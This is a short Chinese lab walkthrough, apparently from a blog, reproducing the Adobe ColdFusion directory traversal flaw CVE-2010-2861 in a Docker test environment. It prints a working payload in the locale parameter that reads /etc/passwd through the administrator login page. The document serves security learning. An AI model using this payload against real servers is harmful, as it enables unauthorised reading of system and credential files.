Adobe ColdFusion Directory Traffic漏洞(CVE-2010-2861
Adobe ColdFusion是由J.J.Allaire于1995年创建的商业快速Web应用程序开发计算平台。
Adobe ColdFusion 9.0.1及更早版本中存在一个目录遍历漏洞,远程攻击者可通过locale参数读取任意文件到
(1)CFIDE/administrator/settings/mappings.cfm
(2)logging/settings.cfm
(3)日志/index.cfm
(4)j2eepackaging/editarchive.cfm和
(5)在CFIDE/administrator/中输入.cfm
环境设置
执行以下命令以启动Adobe CouldFusion 8.0.1服务器:
docker compose up -d
服务器启动可能需要1~5分钟。之后,访问http://your-ip:8500/CFIDE/administrator/enter.cfm
查看初始化页面,输入密码admin
初始化整个服务器。
初始化后界面为
抓取当前路径下的包放到Repeater
放入重放器里,把/CFIDE/administrator后面修改为以下poc,并且需要把cookie删除
/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
重发
成功读取
最后使用完靶场,记得关闭
docker-compose down
暂无评论
发表评论